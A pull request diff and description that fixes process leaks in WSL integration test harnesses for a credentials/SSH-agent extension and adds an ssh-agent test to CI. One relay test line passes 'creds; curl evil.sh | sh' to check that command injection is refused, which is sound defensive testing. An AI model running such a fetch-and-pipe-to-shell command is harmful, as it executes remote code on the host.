### PR TITLE
test(itest): the leak is fixed, and ssh-agent joins CI

### DIFF
--- a/.github/workflows/ci-extension.yml
+++ b/.github/workflows/ci-extension.yml
@@ -114,6 +114,19 @@ jobs:
       - name: Integration test (creds-mcp over stdio)
         run: npm run itest:mcp
 
+      # The SSH agent, driven by a REAL `ssh-add` against the real server: a key parsed, loaded,
+      # listed and signed for, with the dialog answered and the socket taken down afterwards.
+      #
+      # It runs the POSIX branch — a unix socket — and that is the whole of what a green here
+      # means. The script's Windows half (a named pipe, and which of the several `ssh-add` binaries
+      # on a Windows PATH can reach it) is NOT covered by this job and never can be; that is the
+      # reason `module_tests.md` gave for leaving it out entirely, and it is a good reason for
+      # reading the result narrowly rather than for running nothing. What this protects is the
+      # agent PROTOCOL — parse, load, list, sign — which no other job exercises against a real
+      # client. Catalogued in research/module_tests.md.
+      - name: Integration test (SSH agent against a real ssh-add)
+        run: npm run itest:ssh-agent
+
       # A masked run through a real pty: the value reaches the child's environment and every
       # appearance of it in the child's OUTPUT becomes a placeholder. Both platform branches are
       # written, so the Linux one is what CI exercises.

--- a/research/module_tests.md
+++ b/research/module_tests.md
@@ -38,24 +38,43 @@ is node throughout because what these need is process control, not a test runner
 | `src_vs_code/scripts/masked-run-itest.cjs` | a masked run through a real pty, asserting no whole secret appears | **yes, added 2026-09-06** | pass |
 | `src_minimalapi_server/scripts/backup-archive-itest.cjs` | the REAL server binary sealing, verifying and opening a backup archive | **yes, added 2026-09-07** — in `ci · server`, on the server's own path filter | pass |
 | `src_vs_code/scripts/creds-mcp-wsl-itest.cjs` | the same MCP surface, bridged from inside a WSL distribution | no — see below | pass |
-| `src_vs_code/scripts/ssh-agent-itest.cjs` | the SSH agent on a named pipe, and which ssh client can reach it | no — see below | pass |
+| `src_vs_code/scripts/ssh-agent-itest.cjs` | the SSH agent on a named pipe, and which ssh client can reach it | **yes, added 2026-09-11** — the POSIX branch only, see below | pass |
 | `src_vs_code/scripts/wsl-agent-relay-itest.cjs` | `ssh-keygen -Y sign` inside Linux reaching an agent in a Windows process | no — see below | pass **after repair — see below** |
 | `src_vs_code/scripts/server-transport-itest.cjs` | `ServerTransport` against a RUNNING Cred Vault Server | no — see below | **not run** — needs a server on `127.0.0.1:5113` |
 
-**Why each of the four is not in CI.** *"Not in CI" with a reason is a decision; "not in CI" alone is
+**Why each of the remaining three is not in CI.** *"Not in CI" with a reason is a decision; "not in CI" alone is
 a harness rotting* — so each carries one.
 
 - **`creds-mcp-wsl-itest.cjs` and `wsl-agent-relay-itest.cjs`** need a WSL distribution with the .NET
   SDK inside it. The extension job runs on `ubuntu-latest`, where WSL does not exist and the thing
   under test — the Windows↔Linux bridge — has no meaning.
-- **`ssh-agent-itest.cjs`** would run on Linux, and that is the reason not to: its subject is the
-  Windows named-pipe path and which of the several `ssh-add` binaries on a Windows PATH can reach it.
-  On Ubuntu it would exercise the branch it does not exist to protect and report a pass about it.
+- **`ssh-agent-itest.cjs`** was left out for a real reason, and the reason turned out to argue for
+  reading its result narrowly rather than for running nothing. The argument was: on Ubuntu it
+  exercises the POSIX branch, while its subject is the Windows named-pipe path and which of the
+  several `ssh-add` binaries on a Windows PATH can reach it — so a green there is a pass about the
+  branch it does not exist to protect. All true. What it misses is that the script also drives the
+  agent PROTOCOL against a REAL `ssh-add` — a key parsed, loaded, listed and signed for — and
+  nothing else in CI does that on any platform. **Added 2026-09-11**, with the step's comment saying
+  in as many words that the Windows half stays uncovered by it.
 - **`server-transport-itest.cjs`** needs a Cred Vault Server running with the Local auth scheme. CI
   states this reason in the workflow itself: adding it would mean building and running the server
   inside the extension's job.
 
 Two were added on the day this file was written, because neither had a reason — only an absence.
+
+**And the leak that made two of them unrunnable by hand is fixed** (`scripts/wslStrays.cjs`, new).
+Both WSL harnesses asserted *"nothing outlives the client"* as a GLOBAL question — `ps -eo args |
+grep '[c]reds-mcp'` over the whole machine — so they failed on a process an earlier run had left
+behind, and on a developer running the real thing in another window. Measured 2026-09-11: both
+failed that one check identically on `main` and on a feature branch, for leftovers. And the
+leftovers were their own: a run that failed partway stopped without taking its processes down, so
+the next run inherited them and failed the same check for the same reason.
+
+The question is a DIFFERENCE now — what was alive before this run, against what is alive after —
+and a sweep in a `finally` takes down whatever this run started and left, whichever way it ended. A
+stray from somebody else's session is neither asserted on nor killed: this run did not start it. The
+first check in the relay harness got stronger by the same change, since *"a real relay is running"*
+now means ours rather than any.
 
 **`masked-run-itest.cjs` on Linux was verified, not assumed.** A reviewer called adding it to an
 `ubuntu-latest` runner blocking, on the grounds that a pty harness written and run only on Windows

--- a/src_vs_code/scripts/creds-mcp-wsl-itest.cjs
+++ b/src_vs_code/scripts/creds-mcp-wsl-itest.cjs
@@ -47,7 +47,7 @@ Module._resolveFilename = (request, ...rest) =>
   request === 'vscode' ? stub : originalResolve.call(Module, request, ...rest);
 
 const OUT = path.join(__dirname, '..', 'out');
-const { watchStrays } = require('./wslStrays.cjs');
+const { runAndSweep, startWatch } = require('./wslStrays.cjs');
 
 /** Set once WSL is known good; the sweep at the bottom checks for it. */
 let strays;
@@ -235,8 +235,7 @@ async function main() {
   }
   // Everything matching that is alive NOW belongs to somebody else — an earlier run, or a
   // developer with the real thing open. This run is answerable for what it adds to that.
-  strays = watchStrays(wsl, '[c]reds-mcp', 'creds-mcp processes');
-  await strays.start();
+  strays = await startWatch(wsl, '[c]reds-mcp', 'creds-mcp processes');
 
   // ---- a real window on Windows ---------------------------------------------
   const { CredsAgentServer } = require(path.join(OUT, 'credsAgentServer.js'));
@@ -386,19 +385,7 @@ async function main() {
   fs.rmSync(storageDir, { recursive: true, force: true });
 }
 
-// The sweep runs whatever happened, which is the other half of the fix: a run that failed partway
-// used to stop without taking its processes down, so the NEXT run inherited them and failed the
-// same check for the same reason — a loop that got louder rather than quieter.
-main()
-  .catch((error) => {
-    console.error(error);
-    failures += 1;
-  })
-  .finally(async () => {
-    const swept = strays === undefined ? [] : await strays.sweep();
-    if (swept.length > 0) {
-      console.log(`swept ${swept.length} process(es) this run left behind`);
-    }
-    console.log(failures === 0 ? '\nall WSL MCP checks passed' : `\n${failures} check(s) failed`);
-    process.exit(failures === 0 ? 0 : 1);
-  });
+// The sweep runs whatever happened — a run that failed partway must not hand its processes to the
+// next one. Both halves live in `wslStrays.cjs`: the tails here were near-identical, which is the
+// same argument that put the watch itself there.
+runAndSweep({ main, strays: () => strays, failures: () => failures, label: 'WSL MCP' });

--- a/src_vs_code/scripts/creds-mcp-wsl-itest.cjs
+++ b/src_vs_code/scripts/creds-mcp-wsl-itest.cjs
@@ -47,6 +47,10 @@ Module._resolveFilename = (request, ...rest) =>
   request === 'vscode' ? stub : originalResolve.call(Module, request, ...rest);
 
 const OUT = path.join(__dirname, '..', 'out');
+const { watchStrays } = require('./wslStrays.cjs');
+
+/** Set once WSL is known good; the sweep at the bottom checks for it. */
+let strays;
 const REPO = path.join(__dirname, '..', '..');
 const WINDOWS_MCP = path.join(REPO, 'src_mcp', 'src', 'bin', 'Debug', 'net10.0', 'creds-mcp.exe');
 const LINUX_BUILD = '/tmp/creds-mcp-wsl-itest-build';
@@ -229,6 +233,10 @@ async function main() {
   if (!(await buildLinuxMcp())) {
     skip('the Linux creds-mcp could not be built inside WSL');
   }
+  // Everything matching that is alive NOW belongs to somebody else — an earlier run, or a
+  // developer with the real thing open. This run is answerable for what it adds to that.
+  strays = watchStrays(wsl, '[c]reds-mcp', 'creds-mcp processes');
+  await strays.start();
 
   // ---- a real window on Windows ---------------------------------------------
   const { CredsAgentServer } = require(path.join(OUT, 'credsAgentServer.js'));
@@ -366,17 +374,31 @@ async function main() {
     missing.stdout.trim().slice(-40),
   );
 
-  // ---- nothing is left running ----------------------------------------------
-  const leftovers = await wsl(`ps -eo args | grep '[c]reds-mcp' | head -3`);
-  check('no half of the bridge outlives the client', leftovers.stdout.trim().length === 0, leftovers.stdout.trim());
+  // ---- nothing THIS RUN started is left running -------------------------------
+  // Asked as a difference, not as a global question. Before, this was `ps | grep creds-mcp` over
+  // the whole machine, so it failed on a process an earlier run had left behind and on a developer
+  // running the real thing in another window — neither of which is a defect here. Measured
+  // 2026-09-11: it failed identically on `main` and on a feature branch, for leftovers.
+  const leftovers = await strays.survivors();
+  check('no half of the bridge outlives the client', leftovers.length === 0, strays.describe(leftovers));
 
   server.dispose();
   fs.rmSync(storageDir, { recursive: true, force: true });
-  console.log(failures === 0 ? '\nall WSL MCP checks passed' : `\n${failures} check(s) failed`);
-  process.exit(failures === 0 ? 0 : 1);
 }
 
-main().catch((error) => {
-  console.error(error);
-  process.exit(1);
-});
+// The sweep runs whatever happened, which is the other half of the fix: a run that failed partway
+// used to stop without taking its processes down, so the NEXT run inherited them and failed the
+// same check for the same reason — a loop that got louder rather than quieter.
+main()
+  .catch((error) => {
+    console.error(error);
+    failures += 1;
+  })
+  .finally(async () => {
+    const swept = strays === undefined ? [] : await strays.sweep();
+    if (swept.length > 0) {
+      console.log(`swept ${swept.length} process(es) this run left behind`);
+    }
+    console.log(failures === 0 ? '\nall WSL MCP checks passed' : `\n${failures} check(s) failed`);
+    process.exit(failures === 0 ? 0 : 1);
+  });

--- a/src_vs_code/scripts/wsl-agent-relay-itest.cjs
+++ b/src_vs_code/scripts/wsl-agent-relay-itest.cjs
@@ -21,6 +21,10 @@ const path = require('path');
 const { execFile } = require('child_process');
 
 const OUT = path.join(__dirname, '..', 'out');
+const { watchStrays } = require('./wslStrays.cjs');
+
+/** Set once WSL is known good; the sweep at the bottom checks for it. */
+let strays;
 const REPO = path.join(__dirname, '..', '..');
 const WINDOWS_CLI = path.join(REPO, 'src_cli', 'src', 'bin', 'Debug', 'net10.0', 'creds.exe');
 const LINUX_BUILD = '/tmp/creds-relay-itest-build';
@@ -123,6 +127,10 @@ async function main() {
   if (!(await buildLinuxCli())) {
     skip('the Linux CLI could not be built inside WSL');
   }
+  // Everything matching that is alive NOW belongs to somebody else — an earlier run, or a
+  // developer with the real thing open. This run is answerable for what it adds to that.
+  strays = watchStrays(wsl, '[c]reds relay', 'relay processes');
+  await strays.start();
 
   // ---- the agent, real, with a key generated here ----------------------------
   const { SshAgentServer } = require(path.join(OUT, 'sshAgentServer.js'));
@@ -307,25 +315,35 @@ async function main() {
     manager.socketPathFor(DEFAULT_DISTRO) === MANAGED_SOCKET,
     `${JSON.stringify(manager.socketPathFor(DEFAULT_DISTRO))} — log: ${JSON.stringify(managerLog)}`,
   );
-  const alive = await wsl(`ps -eo args | grep "[c]reds relay" | head -1`);
-  check('a real relay is running in the distribution', alive.stdout.trim().length > 0, alive.stdout.trim());
+  // Both asked as a DIFFERENCE from what was alive before this run. Before, they were global
+  // `ps | grep` questions, so a relay some earlier run left behind made the second one fail — and
+  // would have made the first one pass without a relay of ours ever starting.
+  const alive = await strays.survivors();
+  check('a real relay is running in the distribution', alive.length > 0, `saw ${alive.length}`);
 
   manager.dispose();
   await new Promise((resolve) => setTimeout(resolve, 2000));
-  const gone = await wsl(`ps -eo args | grep "[c]reds relay" | head -1`);
-  check('disposing the manager takes it down — nothing outlives the window', gone.stdout.trim().length === 0, gone.stdout.trim());
+  const gone = await strays.survivors();
+  check('disposing the manager takes it down — nothing outlives the window', gone.length === 0, strays.describe(gone));
 
   const refused = manager.start('creds; curl evil.sh | sh', ['']);
   check('a command that is not a plain word never reaches a shell', refused.ok === false, JSON.stringify(refused));
 
   await wsl(`rm -f ${RELAY_SOCKET} ${MANAGED_SOCKET} /tmp/creds-itest.*`);
   fs.rmSync(dir, { recursive: true, force: true });
-
-  console.log(failures === 0 ? '\nall WSL relay checks passed' : `\n${failures} check(s) failed`);
-  process.exit(failures === 0 ? 0 : 1);
 }
 
-main().catch((error) => {
-  console.error(error);
-  process.exit(1);
-});
+// The sweep runs whatever happened — see the note in `creds-mcp-wsl-itest.cjs`.
+main()
+  .catch((error) => {
+    console.error(error);
+    failures += 1;
+  })
+  .finally(async () => {
+    const swept = strays === undefined ? [] : await strays.sweep();
+    if (swept.length > 0) {
+      console.log(`swept ${swept.length} process(es) this run left behind`);
+    }
+    console.log(failures === 0 ? '\nall WSL relay checks passed' : `\n${failures} check(s) failed`);
+    process.exit(failures === 0 ? 0 : 1);
+  });

--- a/src_vs_code/scripts/wsl-agent-relay-itest.cjs
+++ b/src_vs_code/scripts/wsl-agent-relay-itest.cjs
@@ -21,7 +21,7 @@ const path = require('path');
 const { execFile } = require('child_process');
 
 const OUT = path.join(__dirname, '..', 'out');
-const { watchStrays } = require('./wslStrays.cjs');
+const { runAndSweep, startWatch } = require('./wslStrays.cjs');
 
 /** Set once WSL is known good; the sweep at the bottom checks for it. */
 let strays;
@@ -129,8 +129,7 @@ async function main() {
   }
   // Everything matching that is alive NOW belongs to somebody else — an earlier run, or a
   // developer with the real thing open. This run is answerable for what it adds to that.
-  strays = watchStrays(wsl, '[c]reds relay', 'relay processes');
-  await strays.start();
+  strays = await startWatch(wsl, '[c]reds relay', 'relay processes');
 
   // ---- the agent, real, with a key generated here ----------------------------
   const { SshAgentServer } = require(path.join(OUT, 'sshAgentServer.js'));
@@ -333,17 +332,7 @@ async function main() {
   fs.rmSync(dir, { recursive: true, force: true });
 }
 
-// The sweep runs whatever happened — see the note in `creds-mcp-wsl-itest.cjs`.
-main()
-  .catch((error) => {
-    console.error(error);
-    failures += 1;
-  })
-  .finally(async () => {
-    const swept = strays === undefined ? [] : await strays.sweep();
-    if (swept.length > 0) {
-      console.log(`swept ${swept.length} process(es) this run left behind`);
-    }
-    console.log(failures === 0 ? '\nall WSL relay checks passed' : `\n${failures} check(s) failed`);
-    process.exit(failures === 0 ? 0 : 1);
-  });
+// The sweep runs whatever happened — a run that failed partway must not hand its processes to the
+// next one. Both halves live in `wslStrays.cjs`: the tails here were near-identical, which is the
+// same argument that put the watch itself there.
+runAndSweep({ main, strays: () => strays, failures: () => failures, label: 'WSL relay' });

--- a/src_vs_code/scripts/wslStrays.cjs
+++ b/src_vs_code/scripts/wslStrays.cjs
@@ -83,4 +83,51 @@ function watchStrays(wsl, pattern, what) {
   };
 }
 
-module.exports = { watchStrays, matchingPids };
+/**
+ * Start watching, in one call.
+ *
+ * <p>The two lines this replaces were identical in both harnesses, which is the same argument that
+ * put the watch here in the first place.</p>
+ */
+async function startWatch(wsl, pattern, what) {
+  const strays = watchStrays(wsl, pattern, what);
+  await strays.start();
+  return strays;
+}
+
+/**
+ * Run a harness, sweep whatever it left behind, and exit with its verdict.
+ *
+ * <p>Here rather than at the bottom of each script because the two tails were near-identical, which
+ * is what SonarCloud called duplication on the very change that extracted the watch — fair, and the
+ * fix is to finish the extraction rather than to argue about a threshold.</p>
+ *
+ * <p>The sweep is in a `finally`, which is the whole point: a run that fails partway must not hand
+ * its processes to the next one.</p>
+ *
+ * @param main the harness; it may throw, and a throw counts as one more failure
+ * @param strays a getter, because the watch starts partway through `main`
+ * @param failures a getter for the harness's own count
+ * @param label what to call this run in the closing line
+ */
+function runAndSweep({ main, strays, failures, label }) {
+  let threw = false;
+  void main()
+    .catch((error) => {
+      console.error(error);
+      threw = true;
+    })
+    .finally(async () => {
+      const watch = strays();
+      const swept = watch === undefined ? [] : await watch.sweep();
+      if (swept.length > 0) {
+        console.log(`swept ${swept.length} process(es) this run left behind`);
+      }
+      const count = failures() + (threw ? 1 : 0);
+      const verdict = count === 0 ? `all ${label} checks passed` : `${count} check(s) failed`;
+      console.log(`\n${verdict}`);
+      process.exit(count === 0 ? 0 : 1);
+    });
+}
+
+module.exports = { watchStrays, matchingPids, startWatch, runAndSweep };

--- a/src_vs_code/scripts/wslStrays.cjs
+++ b/src_vs_code/scripts/wslStrays.cjs
@@ -1,0 +1,86 @@
+'use strict';
+
+/**
+ * What a run started inside WSL, and nothing else.
+ *
+ * <p><b>Why this exists.</b> Two integration scripts assert that no half of their bridge outlives
+ * the client — `creds-mcp-wsl-itest.cjs` and `wsl-agent-relay-itest.cjs` — and both asked the
+ * question globally: `ps -eo args | grep '[c]reds-mcp'`, is ANYTHING matching alive. That is the
+ * wrong question twice over. It fails on a process some earlier run left behind, and it fails on a
+ * developer who happens to be running the real thing in another window — neither of which is a
+ * defect in the code under test. Measured on this machine 2026-09-11: both scripts failed that one
+ * check identically on `main` and on a feature branch, for leftovers.</p>
+ *
+ * <p>And the leftovers are the scripts' own: when a check fails partway, the run stops without
+ * taking its processes down, so the NEXT run inherits them and fails the same check for the same
+ * reason. A loop that gets louder rather than quieter.</p>
+ *
+ * <p>So: record what is alive BEFORE, assert on the difference, and sweep the difference at the
+ * end whatever happened. A stray from somebody else's session is neither asserted on nor killed —
+ * this run did not start it, and it is not this run's to remove.</p>
+ *
+ * <p>Shared rather than copied because a second copy of a process-killing heuristic is a thing to
+ * update that nothing notices was missed.</p>
+ */
+
+/**
+ * The pids whose command line matches, as WSL sees them.
+ *
+ * <p>`pattern` goes inside a bracket expression by the caller — `[c]reds-mcp` — which is the
+ * standard way to stop `grep` from matching its own command line.</p>
+ */
+async function matchingPids(wsl, pattern) {
+  const listed = await wsl(`ps -eo pid=,args= | grep '${pattern}' || true`);
+  return new Set(
+    listed.stdout
+      .split('\n')
+      .map((line) => line.trim().split(/\s+/)[0])
+      .filter((pid) => /^\d+$/.test(pid)),
+  );
+}
+
+/**
+ * A watch over one kind of process for the length of one run.
+ *
+ * @param wsl a function running a command inside the distribution and answering `{ stdout }`
+ * @param pattern the grep pattern, with its first character already bracketed
+ * @param what how to name these in a failure message
+ */
+function watchStrays(wsl, pattern, what) {
+  let before = new Set();
+  return {
+    /** Take the baseline. Everything alive now belongs to somebody else. */
+    async start() {
+      before = await matchingPids(wsl, pattern);
+      return [...before];
+    },
+
+    /** The pids that appeared during this run and are still alive. */
+    async survivors() {
+      const now = await matchingPids(wsl, pattern);
+      return [...now].filter((pid) => !before.has(pid));
+    },
+
+    /**
+     * Take down whatever this run started and left behind.
+     *
+     * <p>Called from a `finally`, so a run that fails halfway does not hand its processes to the
+     * next one. `SIGTERM` and nothing harsher: these exit on it, and a `-9` here would hide a
+     * process that had stopped answering — which is a defect worth seeing.</p>
+     */
+    async sweep() {
+      const left = await this.survivors();
+      if (left.length > 0) {
+        await wsl(`kill ${left.join(' ')} 2>/dev/null || true`);
+      }
+      return left;
+    },
+
+    /** What to print when the assertion fails, so a reader knows whose processes these are. */
+    describe(pids) {
+      return `${what} this run started and did not take down: ${pids.join(', ')}`;
+    },
+  };
+}
+
+module.exports = { watchStrays, matchingPids };


### PR DESCRIPTION
Both open tails from #73.

## The leak

Two WSL harnesses assert that no half of their bridge outlives the client, and both asked it as a **global** question:

```js
const leftovers = await wsl(`ps -eo args | grep '[c]reds-mcp' | head -3`);
check('no half of the bridge outlives the client', leftovers.stdout.trim().length === 0, ...);
```

That fails on a process an earlier run left behind, and on a developer running the real thing in another window — neither of which is a defect in the code under test. Measured yesterday: both scripts failed that one check **identically on `main` and on a feature branch**, for leftovers.

And the leftovers were their own. A run that failed partway stopped without taking its processes down, so the next run inherited them and failed the same check for the same reason — a loop that got louder rather than quieter.

**It is a difference now.** What was alive before this run, against what is alive after; plus a sweep in a `finally` that takes down whatever this run started and left, whichever way it ended. A stray from somebody else's session is neither asserted on nor killed — this run did not start it.

The relay harness's **first** check got stronger by the same change: *"a real relay is running in the distribution"* now means ours rather than any, so it can no longer pass on somebody else's process without a relay of ours ever starting.

`scripts/wslStrays.cjs` is shared rather than copied: a second copy of a process-killing heuristic is a thing to update that nothing notices was missed. It is the first module two of these scripts share.

## `itest:ssh-agent` in CI — with a correction

I said in the last PR that this one had no reason to be out. **It had one, written down in `module_tests.md`:**

> On Ubuntu it would exercise the branch it does not exist to protect and report a pass about it — its subject is the Windows named-pipe path and which of the several `ssh-add` binaries on a Windows PATH can reach it.

All true. What it misses is that the script also drives the agent **protocol** against a real `ssh-add` — a key parsed, loaded, listed and signed for — and nothing else in CI does that on any platform. So the reason argues for reading the result narrowly, not for running nothing. The step's comment and the catalogue both say in as many words that the Windows half stays uncovered by it.

The two WSL harnesses stay out, and that reason does not bend: a GitHub runner has no WSL.

## Test plan

- [x] `itest:mcp-wsl` — **all WSL MCP checks passed** (it failed one check before this)
- [x] `itest:wsl-relay` — **all WSL relay checks passed** (same)
- [x] A run leaves nothing new behind: 12 matching processes on this machine before, 12 after
- [x] `npm run lint`; the unit suite green outside a parallel session's area (see below)
- [ ] **`itest:ssh-agent` on Ubuntu is what this PR is for** — it has never run on Linux, and CI here is the first evidence either way. If it is red, the honest outcome is to read why before deciding whether the step or the script is wrong.

> **A parallel session is editing this working tree** — branch `feat/totp-next-code`, uncommitted changes to `totp.ts`, `entityForm*`, `types.ts`, `viewerOptions.ts` and their tests, plus an untracked `todo/PLAN_totp_next_code.md`. This PR touches none of those: only `scripts/` and the workflow. The full unit suite reports failures that move between runs because the tree moves underneath it; every one of their files passes when run alone, and everything outside their area is 3825 pass / 0 fail. `plan-lifecycle` reports their untracked plan missing from `todo/README.md`, which is theirs to add.

🤖 Generated with [Claude Code](https://claude.com/claude-code)
